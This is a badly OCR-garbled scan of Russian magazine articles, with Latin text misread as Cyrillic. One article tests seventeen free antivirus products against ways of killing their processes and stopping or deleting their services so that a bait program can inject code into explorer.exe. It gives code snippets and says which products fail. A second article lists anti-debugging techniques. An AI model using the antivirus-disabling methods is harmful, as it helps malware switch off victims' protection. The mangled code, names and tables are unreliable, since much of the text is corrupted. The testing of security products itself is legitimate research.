В цикле от 0 до 4096 вызываем АРІ ОирІісаІеНапсІІе с параметрами 
ТагдеХРгосеззНапсІІе и ТагдеШапсІІе равными нулю, а Орііопз равным ОІІРІ_І- 
САТЕ_СЮЗЕ_ЗОияСЕ. Эти действия закроют все (ну или почти все} хендлы 
открытого процесса: 

НАІМРІ.Е бРгосезз = 0репРгосе55(РК0СЕ55_РиР_НАПР1Е ,0,^е 

ре.ТЬ32РгосеззІ0Хі 

Тог (іпсіех = 0; іпсіех < 4096: іпсіех т+) «-'Рир1ісаТеНапб1е«-< 

(МРгосе53 л ГНАМР ЕЕП псІех, ИШЛ., ИЦИ . 0, 0,_е 

□иРІЛСАТЕ_Ст5Е_50иКСЕ ) ; 

Способ 6. Последовательный вызов АРІ-функций 
СгеаІеЗоЬОЬ|есі,А58ідпРгосе88ТоіІоЬОЬ|есі 
и Тегтіпаіе иоЬОЬіес! 

Создаем новый объект задания, связываем его с нужным процессом, по- 
том завершаем работу объекта и связанного с ним процесса функцией 
ТегтіпаІіеиоЬОЬіесі: 

// Ищем процесс с нужным именем 

НАМРІ.Е Іі5 пар5 ИоТ = С геаТеТ оо1Іі е1р325па р5ІіоТ«-< 

(ТН32С5_5МАРРК0СЕ55, 0); 

Ргосез532Рігз1:(Іі5пар5ІіоТд &ре)_; 

йоЛ 

ІТ ( ТсзстрГре. згЕхеРіІе . Ргосе55Мате }== 0) { 

НАШІ.Е МРгосезз = Ор е пРгос е зз^РКОС Е ББ 5ЕТ ОУО ТА | «-■ 

РК0СЕ55 ТЕКМINАТЕ , 0 , ре . ■^:I^32Ргосе55І^)^ 

НАМР1.Е ИЭоЬ =. СгеаТе^оЬОЬ^есТ(N^^^ ^ 

А5 5І2пРгосе55ТоЗоЬ0Ь^есТ(I^^оЬ ^ бРгосезз) ; 
ТегтіпаТеЗоЬОЬз‘есі:(ІпЗоЬ,, 0); 

1 

} 

ыНіІ е (Ргосе5532МехТ(И5пар5бо1:, &ре)); 

Способ 7. Посылка ѴѴМ^ОШТ окну процесса 

Сначала напишем функцию обратного вызова, которая и будет посылать окну 
нужного процесса ѴѴМ_ОІЛТ: 

ВОРЕ САН ВАС К 0иіТЫІпгіоЫ 5Ргос( Н1лІШ ИыпсІ. Ь РАКАМ ІРагат} 

{ 

ІІЮМС ргосеъзісі; 

Се1:ІлІіпсІоіл;ІМгеасІРгосе5 5ІсІ(ІИлгпсІ л &ргосе5 5І(^)^ 

іт ( ргосевБІсі -= (ШОМб)ІРагат) 

Ро5ЕМе55аёе(Ь'л/псІ : , ЫМ_ 51 ЛТ^ 0)^ 

геіигп ТКІІЕ; 

> 

Далее, используя ЕпитѴѴіпбоѵѵз, передаем в ранее установленную 
саІІЬаск-функцию ОиіХѴѴіпбоѵѵзРгос Ю нужного нам процесса, после чего окно 
процесса получитѴѴМ ОІЛТ. 
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о сіі/сігЫ 



Выключение службы 



Программа пытается выключить системную службу аѵа^ТІ, отключив экраны в 
реальном времени* Эта операция оставит вашу систему без защиты* 

Желаете продолжить? 

(Выберите "НеГ\ если это действие не входит в ваши намерения) 



Да 



Нет (58) 



«Вредоносный» код успешно внедрен 



Реакция аѵаві! Ргее Апііѵігив на попытку остановить сервис 



Способ 8. Остановка сервиса 

Для нужного сервиса делаем Орепбегѵісе 
с ОезігесіАссезз равным 5ЕПѴІСЕ_5ТОР, далее ис- 
пользуем функцию СопІгоІЗегѵісе с параметром 
Сопітоі равным 5ЕНѴІСЕ_СОМТРОІ__5ТОР: 

ііБСМ = ОрепБСМапа^ег^ 

( І_ и 4 _5С_МАМАС Е К_С0Ш Е СТХі 

ИБегѵісеНапсІІе = Ореп5егѵісе(И5СМ л <-■ 

РгосеззМате. 5ЕКѴІСЕ 5Т0Р): 

СопТро15егѵісеПі5ерѵісеНапгі1е. ^ 

5ЕКѴІСЕ С0МТК01- 5Т0Р. &5ѳгѵісе51:а1:и5 V. 

Способ 9. Удаление сервиса 

Открываем нужный сервис с ОезігесіАссезз рав- 
ным ОЕІ.ЕТЕ, далее используем АРІ ОеІеІеЗегѵісе: 

Н5СМ =_ 0реп5СМа па|ве г( МУН. N□11, 

5С^АІШЕК_ШУМЕСТ) ; 

НБегѵісеНапеіІе = 0реп$егу1се(б5СМ л <-■ 
РросеззМате, 0Е1ЕТЕ); 
Ое1еі:е5ерѵісе(Іі5ерѵісеНапсІ1е) 

Программа-приманка 

Для проверки работоспособности антивиру- 
са после наших манипуляций с его процессами 
и сервисами мы воспользовались маленькой 
программкой, написанной на РАЗМ’е и имитиру- 
ющей вредоносное воздействие. Все очень про- 
сто: внедряем посторонний код в ехріогег.ехе соз- 
данием удаленного потока. В предыдущем тесте 
про крипторы мы использовали точно такую же, 
шифруя ее всякими разными способами. 

Испытание антивируса будет заключаться 
в сравнении реакции на программу-приманку 
до нашего воздействия на процессы и сервисы 
антивируса и после него. Если после воздей- 
ствия антивирус позволит выполниться нашей 
приманке, то ставим этому антивирусу жирный 
минус. Итак, начинаем.,. 

360 ШТЕЯЫЕТ8ЕСІІНІТѴ 2013 

Этот антивирус определил нашу приманку 
как Оеіесіесі а зизргсіоиз асйѵііу. Для выполнения 
своих задач он создает четыре процесса; 

* ЗбОгр.ехе, 

* ЗбОзб.ехе, 

* ЛіиОопдЕапдѴи.ехе, 

* ЗбОТгау.ехе 

и два сервиса: 

* ЗбОгр, 

* 2биОопдЕапдѴи. 

Как мы ни старались, но ни один процесс 
и ни один сервис победить не удалось. Антивирус 
стойко продолжал реагировать на нашу подстав- 
ную угрозу. Зачет. 



АО-АѴѴАНЕ РЯЕЕАЫТІѴІНІІЗ + 

Этот антивирусный продукт несет на своем борту 
три процесса: 

* АсІАѵѵаге.ехе, 

* АсІАѵѵагеЗегѵісе.ехе, 

* ЗВАМЗѵс.ехе 

и два сервиса: 

* Ай-Аѵѵаге Зегѵісе, 

* ЗВАМЗѵс. 

Все три процесса элементарно убиваются 
первым способом, и все действие антивируса 
на этом заканчивается. Незачет. 

АМІТІ РВЕЕАІШѴІЯІІ8 

Здесь мы имеем два процесса: 

* АтібАѵ.ехе, 

* АтібАѵЗгѵ.ехе 

и один сервис: 

* атіііаѵзгѵ. 

Оба процесса без боя сдались при первом же 
воздействии ТегтіпаіеРгосезз. Опять двойка. 

АЫѴІ 8МАЯТ ОЕРЕЫОЕЯ РНЕЕ 

С началом своего функционирования антивирус 
запускает следующие процессы: 

* АЗОЗгѵ.ехе, 

* АЗОТгау.ехе, 

* АЗР.ехе, 

* АОВІоскегЗгѵ.ехе, 

* АОВіоскегТгау.ехе 

и такие сервисы: 

* азсізгѵ, 

* АсІЫоскегЗгѵ. 

Первый процесс убивается созданием в нем 
потока с вызовом ЕхіІРгосезз, работа остальных 
завершается первым способом. Незачет. 

АѴА5Т! РЯЕЕАІЛІѴІЯІІЗ 

Этот антивирус определил наш мнимый зловред 
\Л/іп32:Еѵо-деп[зизр]. Имеет в своем составе про- 
цессы : 

* АѵазіБѵс.ехе, 

* АѵазШІ.ехе, 

* аѵазІ.зеШр 

и один сервис: 

* аѵазі! Апііѵігиз. 

Все попытки убить процессы не увенчались 
успехом. А при попытке остановить сервис анти- 
вирус попросил подтверждения данному дей- 
ствию. 



АѴС АІІТІ-ѴІПЦ8 РНЕЕ 2013 

В программе- приманке этот антивирус увидел 
нечто под названием йоѵѵпіоасіег Сепегіс. Запу- 
стил для своей работы шесть процессов: 

• аѵдзгѵ.ехе, 

• аѵдетсх.ехе, 

• аѵдісізадепТехе, 

• аѵдпзх.ехе, 

• аѵдиі.ехе, 

• аѵдѵѵсізѵс.ехе 

и два сервиса: 

• АѴСЮЗАдет, 

- аѵдѵѵсі . 

Все попытки уничтожить процессы и остано- 
вить или удалить сервисы не увенчались успе- 
хом. Антивирус продолжал работать как ни в чем 
не бывало и исправно продолжал реагировать 
на «угрозу». 

АѴІНАРНЕЕ АѴІТІѴІЯЦ82013 

Этот антивирус в нашем «вредоносном» коде уви- 
дел ТП/Щаскег.Сеп. В составе четыре процесса: 

• аѵзбасіоѵѵ.ехе, 

• аѵдиагсі.ехе, 

• аѵѵѵебдгсі.ехе, 

• аѵдпі.ехе. 

Все процессы были успешно ликвидирова- 
ны с помощью четвертого способа — созданием 
удаленного потока в процессах антивируса с вы- 
зовом в этом потоке ЕхйРгосезз. Плохо. Незачет. 

ВАШЦ АЯТІѴІНІІ8 201 3 

ТИе ргодгат із аШтрІіпд Іо тобИу оШег 
ргодгатз — вот что выдал этот антивирус в ответ 
на запуск программы-приманки. Процессы: 

• ВАѴЗѵс.ехе, 

• ВаѵТгау.ехе, 

• ВНірзЗѵс.ехе, 

сервисы: 

• ВАѴЗѵс, 

• ВНірзЗѵс. 

Против этого антивируса сработало только 
удаление обоих сервисов, с последующей пере- 
загрузкой компьютера. Тоже двойка. 

ВІТОЕРЕМОЕН А11ТІѴІЯ1І8 РНЕЕ ЕОІТІОМ 

Имеет в составе три процесса: 

■ дгіідсе.ехе, 

• дгзегѵ.ехе, 

• ирбаіе.ехе 

и один сервис: 

• дгзегѵ. 
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СОМООО Поведенческий анализ 

Приложение согтюсІокіІ<ег не может быть 
опознано и требует неограниченный доступ к 
вашему компьютеру 



тпюаоііисгпаі 
Неопознанный поставщик 





Изолированным запуск (по умолчанию) 

Обеспечивает выполнение приложения с 
ограничение!' т прав доступа 




Запустить без ограничений: 

Разрешить неограниченный доступ к 
ь ы ііі е ук.й.1 а нн й гн П д мпоженИЮ 





Блокировать 

Предотвратит был синение вышеуказанного 
приложения 



Доверять этому приложению 



1 Объект нейтрализован 


X 


Подозрительный объект 

с:\Іе2І таіѵѵаге.ехе 




Рапсіа Сіоисі Апйѵігиз 


РАГЧІОА 

■ « С ь * 1 * і 




сітнив 



На ЗііНиЬ лежат исходники утилиты, 
реализующей все описанные в статье 
способы уничтожения процессов, 
остановки и удаления сервисов, а так- 
же исходник программы - имитатора 
вредоносного воздействия. 



Реакция Сотого на попытку остано- Вот что увидел Рапйа Сіоисі Аптіѵігиз Ргее в нашей «угрозе» 

вить сервис 



Успешно противостоял всем нашим попыт- 
кам нарушить его работоспособность. Ни рабо- 
чие процессы, ни сервис сбить с толку нам так 
и не удалось. Зачет. 

СОМООО АЫТІѴІГШ5 2013 

При запуске программы-приманки вынес преду- 
преждение о внедрении постороннего кода в про- 
цесс ехріогег.ехе. Рабочие процессы: 

* саѵѵѵр.ехе, 

* сіз.ехе, 

* СізТгау.ехе, 

* стбадепі.ехе, 

* стбирб.ехе, 

сервисы: 

* стбАдепі, 

* стбѵИН, 

Победить этот антивирус удалось только 
удалением процессов с последующей переза- 
грузкой. При этом, как и всякий раз, когда этот 
антивирус замечает какие-нибудь сомнительные 
действия, было выдано предупреждение о подо- 
зрительной активности. Так что незаметно оста- 
новить деятельность антивируса не удалось. 

КШСЗОРТ ДЫТІѴІІШЗ 20 1 2 

Придуманную нами «угрозу» распознал какѴѴіп32. 
Тго},Оепегіс.а.(ксІоиб). В составе два процесса: 

* кхезсоге.ехе, 

* кхеігау. ехе 

и один сервис: 

* кхезсоге. 

Данный антивирусный продукт стойко выдер- 
жал все испытания и продолжал работать, несмо- 
тря на все наши старания. 

МІСН080РТ8ЕСШ1ІТѴ Е88ЕЫТІАІ.З 

На попытку запуска программы-приманки бо- 
дро отреагировал и опознал в ней Тгоіап:ѴѴіп32/ 
Адепі Вуразз.деп!к. Для обезвреживания этого, 
в общем-то, широко известного антивируса до- 
статочно было убить два его рабочих процесса: 

* тззесез.ехе, 

* МзМрЕпд.ехе. 

Первый процесс уничтожается простым 
ТептііпаіеРгосезз, второй — модификацией кон- 
текста потока на адрес АР I -функции ЕхііРгосезз. 
Плохо, незачет. 

РАЫ О А С1.0 ІШ АІіТ] V I П Ц 8 РП Е Е 

Этот антивирус интересен тем, что подозритель- 
ные файлы он проверяет в облаке. В нашей «угро- 
зе» он увидел какой-то безликий Зизрісіоиз іііе. 



Имеет в своем составе следующие процессы: 

* РЗІІАМаіп.ехе, 

* РЗАМНозіехе, 

* РЗІІАЗегѵісе.ехе 

и сервисы: 

* ЫапоЗегѵісеМаіп, 

* РЗІІАЗегѵісе. 

Сначала с помощью восьмого способа оста- 
навливаем оба сервиса, затем поочередно уби- 
ваем процессы: первый путем создания потока 
с вызовом в этом потоке ЕхііРгосезз, остальные 
с помощью первого способа — ТептііпаіеРгосезз. 
Незачет. 

РПЕѴЕЫТОЫ АЫТІѴІПЦ8 РРЕЕ 

В программе-приманке этот антивирус заподо- 
зрил не что иное, как программу- взломщик. В его 
составе три процесса: 

* АѴАззізіапі.ехе, 

* АѴЗсаппіпдЗегѵісе.ехе, 

* АѴТгау.ехе 

и два сервиса: 

* АѴ Аззізіапі Зегѵісе, 

* АѴ Зсаппіпд Зегѵісе. 

Останавливаем оба сервиса способом Заби- 
ваем АѴТгау.ехе с помощью ТегтіпаіеРгосезз, 
и «программа-взломщик» беспрепятственно мо- 
жет чинить свои черные дела. 

Ш8ІГ!СШТЕПЫЕТ8ЕСиШТѴРЕП80ЫАІ. 

Этот продукт запускает следующие процессы: 

* ПаѵМопО.ехе, 

* ПзТгау.ехе 

и сервисы: 

* ПзНаѵМоп, 

* ИзМдгЗѵс. 

Применив восьмой способ к ПзМдгЗѵс и де- 
вятый к ПзПаѵМоп, данный антивирус мы обезо- 
ружили, и он никоим образом не препятствовал 
«вредоносному» воздействию. Плохо. 

П0В08САЫ ІМТЕНЫЕТЗЕСІШІТѴ РПЕЕ 

Ѳеп:ѴѴІп32.ЕхрІогегНііаск.адѴѴ@аизк!8о(1} — вот 
как отреагировал этот антивирус на наш «вредо- 
носный» код. В состав входят процессы: 

* ПЗАдепі.гзе, 

* НЗВТЗгѵ.ехе, 

* ПЗІірсІЗгѵ.ехе 

и сервисы: 

* ПоЬозсапПТЗгѵ, 

* ПоЬозсап УрбЗп/. 



Останавливаем оба сервиса восьмым спо- 
собом, убиваем ПЗАдепігзе, посылая ѴѴМ_ОІІІТ 
окну процесса, и можем беспрепятственно вне- 
дрять свой код в ехріогег.ехе. Опять незачет. 

20МЕАІ.АПМ РВЕЕАЫТІѴІІШЗ 

Программа-приманка определилась этим анти- 
вирусом как НЕиВ:Тгоіап.ѴѴІп32.ІпѵаісІег. В соста- 
ве имеет процессы: 

• ѵзтоп.ехе, 

• 2АРгіѵасу8егѵісе.ехе, 

• гаігау.ехе 

и сервис: 

- ІАРгіѵасуЗегѵісе. 

Останавливаем сервис восьмым способом, 
убиваем гаігау.ехе, уничтожая все его потоки 
(способ 2), с остальными двумя процессами 
расправляемся последовательным вызовом АРІ- 
функций; 

• СгеаіебоЬОЬіесі; 

• АззідпРгосеззТобоЬОЬіесі; 

• ТегтіпаіебоЬОЬіесі (способ 6). 

Плохо, незачет, 

ИТОГ 

Четыре антивируса из семнадцати проверенных 
стойко сопротивлялись нашим попыткам их обез- 
вредить, два (Сотобо и аѵазі) спросили разре- 
шение на проведение этих операций, а оставши- 
еся одиннадцать сдались не таким уж и сложным 
способам уничтожения процессов и остановки 
и удаления сервисов. Особен но удручает наличие 
в этом списке довольно распространенных у нас 
антивирусов от МісгозоТС, Аѵіга и Рапба. IX 



Ат ііі Ргее Апііѵігиз 


ТР 


Апѵі Зтагі Оеіепбег Ргее 


ТЕ, ТР 


Аѵіга Ргее Апііѵігиз 2013 


ТЕ 


Ваіби Апііѵігиз 2013 


05 


Місгозоіі Зесигііу Еззепііаіз 


ТР, ЕР 


РапбаСІоиб Апііѵігиз 


38, ТЕ, ТР 


Ргеѵепіоп Апііѵігиз Ргее 


3$,ТР 


Яізіпд Іпіегпеі Зесигііу РегзопаІ 


35,03 


ВоЬозсап Іпіегпеі Зесигііу Ргее 


35, Ш 



Те, кто не выдержал испытаний на прочность 



Аб-Аѵѵаге Ргее Апііѵігиз + 



ГР 



2опеАІагт Ргее Апііѵігиз 



ТТ,ТЗ 
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Классические приемы антиотладки, 
которые должен знати каждый 

Те, кому положено свои программы отлаживать, с удовольствием кормят нас забагованными 
релизами, которые начинают нормально работать только после третьего обновления. Зато те, 
кого отлаживать программы совсем не просят, с удовольствием в чужом творчестве ковыря- 
ются. Вопросы антиотладки интересны не только исследователям малвари (стоящим по обе 
стороны баррикад), но и кодерам, заботящимся о безопасности своих коммерческих поделок. 



С П Е ЦИ А Л ЬНО ОБУЧ Е Н Н Ы Е АРІ-ФУ Н КЦИ И 

В неисчерпаемых недрах ѴѴіпсіоѵѵб, помимо всем 
известной функции ІзОеЬиддегРгезепІ, есть еще 
парочка АРІ, с помощью которых можно довольно 
просто определить факт запуска программы под 
отладчиком. 

Это СНескВетоіеОеЬиддегРгезепІ: 



СМескКето^еОеЬиёёегРгезепІ: ( ЬРгосеБЗ ^ _«-і 

АРЬ^Ре^есІ:^ 

і-Р(РЬ^ Р е~Ьес1:) 

ге~Еигп ѣгие: 



пе^игп Гаізе: 



и МЮиегуІЩогтаІіопРгосезз, вызываемая с Рго 
сеззІпкжтаІюпСІазз = РгосеззОеЬидРогІ: (0x7): 

* * » 

_а5т 



ризіі 0 
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Библиотека антиотладчика 






1 ѴАКЫШС 



Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



ризб 0x4 

ризіі Р1а§РощЬег 

// Ргосеззіп-Рогшаіі о п СІазз = <-■ 
// РпосеззОеЬи§Рог1: 
ризіі 0x7 

ризіі РгосеззЮ 

саіі ^ОиепуІп-Роггпа'ІііопРгосезз 

і 

гМРІае) 

геііигп Іггие; 



геѣигп -Гаізе: 



Однако к популярным отладчикам написано 
множество плагинов и скриптов, нейтрализующих 
действия этих АРІ. В большинстве случаев это до- 
стигается их перехватом, поэтому перед приме- 
нением этих функций желательно проверить их 
код на целостность и отсутствие перехвата, 

ОБРАБОТКА ИСКЛЮЧЕНИЙ 

Достаточно известный и применяемый способ. 
Некоторые АРІ-функции, команды или после- 
довательности команд процессора вызывают 
исключения, и, если программа не запущена 
под отладчиком, управление передается зара- 
нее установленному обработчику исключений. 
В то же время если запустить такую программу 
под отладчиком, то эти же самые функции, коман- 
ды или последовательности никаких исключений 
вызывать не будут. 

Общий принцип применения способа: 



* * * 




{ 




ЗТАТІІЗ^ВВЕАКРОШТ 


0x80000003 


5ТАТЫ5 5І N0 1.Е5ТЕР 


0x80000004 


□ВО_РВІМТЕХСЕРТЮМ_С 


0x40010006 


ОВО_ШРВССЕРТІОМ 


0x40010007 


РВС_С0тГВ01._С 


0x40010005 


РВе_СОЫТРОЬ_ВВЕАК 


0x40010008 


□ВС СОММАЫО ЕХСЕРТІОЫ 


0x40010009 


ЕХС ЕРТІ ОЫ_ѴѴХ8 6_5І N С Ь Е_8Т ЕР 


0x4000001 Е 


ЕХСЕРТІОН_ѴѴХ8б_ВВЕАКРОІМТ 


0x4000001 Р 



ОІІу Агіѵапсегі 1,27 

Вид[і^ [ АсШіопаІ ОрЦопз 
АсШіопаІ 0р1іоп$ 2 

[ Апй-РеЬид " АпЙ-ОбЬид 2 

-АпІі-ОеЬид (№"РВа$есІ 05 опіу] 

Г КіІІ А піі -АКасІі (Н агсЬо ге те ЕЬо сі 1 



І 0 пНапсІ ІесІЕ хсерНопРІбег і 5 

І РгосеззЗЗНекІ П Б 

Г" МогіиІе32Ме$ Г Б 

17 СІіескРетаІеОеЬиддегРгеаепІ Г~ 5 



Г 21^5 еН п ^огтЫіоп Т Нгеа^ Г $ 

І иегу 5 у $1ат I піог таііоп 

[7 ЕІіаЙ иегуІ п( ог пгі аі і опР г о сез й 
Г 

П 2ш0репРгосез$ 

Г ГегтіпаЬеРгосезз Г 5 

П 5сгатЬІе Ехроіі Т аЫе 
Г РіпсКѵ'іпсІо^ 



I - йеіТіскСоипІ 


Г 3 


Г N сі Соипіег (0) 


С* СоипЬе^+1 



Ок | СапсеІ | АЬоиІ | 

МаНКиБ ШОМ ©2сюЭ 

и ^ 



I 4 

Нейтрализация СНескРетоІе- 
□еЬиддегРгезепі и МШиегуІпІогта- 
йопРгооезз в плагине ОКІу АсІѵапсесІ 
для ОІІуОЬд 

<Г 

Значения для ПаізеЕхсерйоп, которые 
можно испол ьзовать для антиотладки 
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КІІ5ЕР_5НАЯЕО__ОАТА+О08 


1 піе гшріТі т е . ІоѵѵРа г 1 


КиЗЕР^ЗНАЯЕО^ОАТА+ООС 


ІпіеггирШте.НідНІІ Тіте 


КиЗЕР ЗНАЙЕО ОАТА+ОЮ 


Іпіе гг ирТО т е . Н і д Н12ТІ т е 


КЦ5ЕР5НАПЕООАТА+014 


ЗузіетТіте . ЬоѵѵРагі 


КІІ5ЕВ5НАНЕЦОАТА+01 8 


Зу&іетТіте.НідНІІ Тіте 


КІІ5ЕВЗНАЯЕЦОАТА+01 С 


5увІетТіте,НідЫ2Тіте 


К113ЕВ8НАЯЕРОАТА+320 


ТіскСоипі. ІоѵуРагІ 


КиЗЕВ_5НАЙЕО_ОАТА+324 


ТіскСоипі. НідЫІ Тіте 


Ки5ЕР_8НАЙЕО_ОАТА+328 


ТіскСоипі НідЫ:2Тіте 



Места в КІІ8ЕН_5НАВЕ0_0АТА, где можно взять значения времени 



На ііі л- а ге Ь геа кро і п 1; : 



I I 

я^»*ди 



Й 


Баге 


Зіге 


5 Іор оп 




1 00251 ЗЗД 




Енесиіе 


рВ Г В Ш ■■■ЦГГІІКІІ ■ в ш Г Г 1 1,_ 

1 Роііоѵѵ 1 Г 












2 


00251 340 




Ехесиіе 


ЕоІІоич 2 












3 

1 


00251 346 




Ехесиіе 


РоНсм 3 












4 


00251 34С 


Г - 


Ехесиіе 


РоІІоѵѵ 4 



□ еіеіе 1 



О еіеіе 2 



□ еіеіе 3 



□ еіеіе 4 



0 К 



РНапЮт орііопз 



Ьісіе Ігогп РЕВ 
ргоІЕй Ркх 

йх ООЗІгіпд , РРЫ, Ітрогі 
Ьоок ВІоскІпрЩ 
Ьоок СеіТіскСоипі 
Ьоок СеіРгосеззТітез 
гетэѵе ЕР Ьгеак 
сизіот ЬапсЯег ехсерйопз 
сЬапде ОІІу сарИоп 
раіеЬ ЫитО№іѵаАпгі5ііез 
-[ргіѵег5] - 

Іоас! сігіѵег 

Ьісіе ОІІуОЬа юіпгіоюз 
Ьоок ЫКеИСопйхГГЬгеасі 
Ьоок кОТЗС 



5аѵе 



Г 

г 

г 

г 

г 

г 

г 

г 

г 

г 

|7 

г 

г 

[7 



ф 

Перехват РЮТ5С в РЬапЮт 
Аппаратные точки останова в ОІІуРЬд 



// В этом месте нужно написать 
и что-нибудь, что может вызвать 
и нужное нам исключение 

* * I 

геѣит ~Ьгие: 

і. 

ехсері ( ЕХСЕРТІОМ_ЕХЕСІІТЕ_НАМОІ-ЕК) 

і 

геііигп -РаІ5е; 

} 

Ш • * 



В качестве нужных команд или АРІ сгодятся: 

■ іпі 0x3 (одним байтом ОхСС); 

• іпі 0x3 (двумя байтами ОхСО, 0x03); 

■ іпі 0x26; 

• іпі 0x2с (работает только подѴѴіп Ѵізіа и выше); 

■ так называемая точка заморозки (команда 
с опкодом 0x11 ); 

• АРІ-функция ОеЬидВгеак (или ОЬдВгеакРоіпІ 
из ШсІІІ.сІІІ)- 

• АРІ-функция ВаізеЕхсерІіоп с некоторыми 
входными значениями; 

• флаг трассировки (Ігар Над), 

Код для Ігар Над: 



азт 

і 

ог ыогб рТг [езр] . 0x100 

рор-Рб 

пор 

} 

. * ф * 

ЗАМЕР ВРЕМЕНИ ВЫПОЛНЕНИЯ 
КОМАНД 

Когда отладчик присутствует и выполняет по- 
шаговую трассировку, появляется существенная 
задержка между выполнением отдельных команд 
по сравнению с обычным выполнением. 

В системе есть довольно много способов из- 
мерения временных промежутков. Вот некоторые 
из них: 

• команда ЕЮТ5С; 

• АРІ-функция ОеІТіскСоипІ; 

■ АРІ-функция ІітеСеІТіпле (из \А/іптт.6ІІ); 

■ АРІ-функция ОиегуРеііогтапсеСоипІег; 

■ АРІ-функция СеіЗузІетТітеАзЕіІеТіте; 

■ АРІ-функция СеІРгосеззТітез; 

• АРІ-функция КіСеіТіскСоипІ (или вызов пре- 
рывания іпі 0х2А); 

■ АРІ-функция І\ІЮиегуІп1огта1іопРгосез5 

(РгосеззІпІогтаІіопСІазз = РгосеззТітез 
(0x04); 

• АРІ-функция МіОиегуІпІогтаІіопТЬгеасІ 

(ТЬгеасііпІогтаІіопСІазз = ТйгеасГПтез (0x01 }; 

• поля структуры КІІ8ЕП 5НАРЕ0 0АТА. 

РЫОКР Тіте^ТагЕ = беТТіскСоипТП : 

РЫОКР ТітеЕпгіі = беТТіскСоипгП : 

іЕ ((ТітеЕпб - ИтеБТагЕ) > ТітеІ_ітгЕ) 



геіигп ЕаІ5е: 



Команду РЮТЗС могут перехватывать и ней- 
трализовать некоторые плагины для ОІІуОЬд. 
Побороть этот перехват можно, замерив какой- 
нибудь большой (примерно 10 с) промежуток вре- 



мени и проконтролировав регистр ебх до и по- 
сле выполнения команды. Если его содержимое 
не изменилось, то налицо перехват РОТЗС. Эту 
проверку лучше засунуть в отдельный поток, что- 
бы не задерживать выполнение основного. 

Перехват ОеГПскСоипІ тоже может присут- 
ствовать в плагинах, и его легко определить таким 
вот кусочком кода: 

РЫОК Р Ті теЗТа ТІ - бе'ЕТіскСоип ТП : 

51еер(1Ѳ0) ; 

РЫОКР ТішеЕпсІ = Се^ТіскСоипТ(); 

I і 1 

Если разница между ТітеЕпб и ТітеЗіаіі 
меньше законной сотни, то СеІТіскСоипІ явно пе- 
рехвачена и висит под контролем какого-нибудь 
плагина. 

Все перечисленное поможет выявить отлад- 
чик при трассировке программы. 

Для выявления отладчика при обыч- 
ном выполнении команд может помочь 
АРІ МЮиегуІпІогтаІіопРгосезз в паре с АРІ 
ОеІЗузІетТітеАзЕіІеТіте: 

9 9 9 

_азт 

і 

ризЬ Ѳ 
ризЬ 0x20 

ризЬ ТітеЗбагЬРоіпбег 

// РгосеззІп-Еогта'СіопСІазз = 

// Рго сеззТітез 

риз И Ѳх4 

ризИ РгосеззЮ 

саіі МіриегуІп-Рогта1:іопРгосе55 

1 II 

СеіБузіетТ ітеАзЕіІеТ ітеч^ 

ХіРРІкЕТІМЕ (&ТітеЕпсІ)^ 

ІЕ_( (ТітеЕтЛ . сЫІ_оШа1:еТіте - 

ТітеЗІіагф. СгеабеТіте. ЕоыРагТ) > *-> 
ПтеИтгЕ) 

пеіигп Тгие ; 

р 1 С р 



Кроме этого, в ѴѴіпсіоѵѵз Ѵізіа и выше мож- 
но воспользоваться особенностью выполнения 
функции ОЬдРгіпІЕх, ход выполнения которой 
под отладкой отличается от обычного и функция 
выполняется дольше (для этих целей также от- 
лично подойдет и ОиІриШеЬидЗІгіпд, но бывает 
иногда так, что ее контролируют антиотладочные 
плагины). 

ОТЛАДОЧНЫЕ РЕГИСТРЫ 

Ненулевое значение специальных отладочных ре- 
гистров процессора запросто может послужить 
фактом, подтверждающим отладку программы. 
Просто так узнать их содержимое не получит- 
ся, и для этого можно либо вызвать исключение 
и прочитать контекст потока, либо воспользовать- 
ся функцией ОеШігеабСопІехІ: 



беіТІігеасІСопі:ех'1:(ТЬгеасіНапсІ1е і _< = і 

&ТЬ ге асі Сопі ехб ) 

і-Р ( (ТІігеасІСоітЬехТ.РгѲ != 0) | | (ТРшеа<Л<— ■ 
СопТехТ . Ргі != 0) | | (ТІігеасіСоп1:ех1:.<-< 

Рг2 != 0) | | (ТІіге абСо ггЬех-Ь .РгЗ ! = Ѳ) > 

Ь а. г.\ ‘I : | ^ |А +■ I I а + 

-!— к кШ 1 1 -к! кІШі 

еізе 



ФЛАГИ ОТЛАДКИ, КУЧИ И ПРОЧЕЕ 

Наверное, только ленивый не проверял флаг 
ВеіпдОеЬиддеб в своих программах, пытаясь за- 
щитить их от незадачливого взломщика. Более 
того, не секрет, что ІзОеЬиддегРгезепІ использует 
его для своей работы, поэтому на различных фла- 
гах, состояние которых указывает на наличие от- 
ладчика, долго останавливаться не будем. 

Значение Е1_0_ НЕАР_ ЕІ\!АВІ_Е_ ТАІІ__СНЕСК 
в ЫЮІоЬаІЕІад указывает диспетчеру кучи, 
что идет процесс отладки и в конце каждого бло- 
ка, выделяемого из кучи, нужно помещать сиг- 
натуру в виде восьми байт ОхАВ для контроля 
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Флаг 


ѴѴіпХР(32ЬіІ) 


ѴѴіпѴізІа, 7(32ЬЙ) 


ѴѴіпХР(64ЬіІ) 


Ѵ7іпѴІ5іа,7(64ЬіЦ 


ВеіпдОеЬиддегі 


РЕВ+0х02 


РЕВ+0х02 


РЕВ+0х02 


РЕВ+0х02 


ЫЮІоЬаІПад 


РЕВ+0х68 


РЕВ+0х68 


РЕВ+ОхЬс 


РЕВ+ОхЬс 


Наде 


[РЕВ+0х18]+0х0с 


[РЕВ+0х18]+0х40 


[РЕВ+ОхЗО]+Ох14 


[РЕВ+0х30]+0х70 


РогсеРІад 


[РЕВ+0х18]+0х10 


[РЕВ+0х18]+0х44 


[РЕВ+0х30]+0х18 


[РЕВ+0х30]+0х74 


КсЮеЬиддегЕпаЫесІ 

(и&егтоЬе) 


КЦ5ЕН 8НАНЕО РАТА+0х2сІ4 
(0х711е02сі4) 


К 113 ЕВ 5НАВЕ0 РАТА+0х2й4 
(0х000000007«е02с14> 


КсЮеЬиддегЕпаЫесІ 
(кегпеі тогіе) 


0х82ЬѲ8368 


Ох«Ш800032793Ю 


КсШеЬиддегМоіРгесепі 
(кегпеі тойе) 


0х82Ь68368 


0хШЯ80003279311 



МІСІоЪаІРІад 




РЬС_НЕАР_ЕМАВІЕ_ТАИ_СНЕСК 


0x00000010 


Р Ю_ Н Е АР_Е N АВ Ь Е_ Р Я Е Е_С Н ЕСК 


0x00000020 


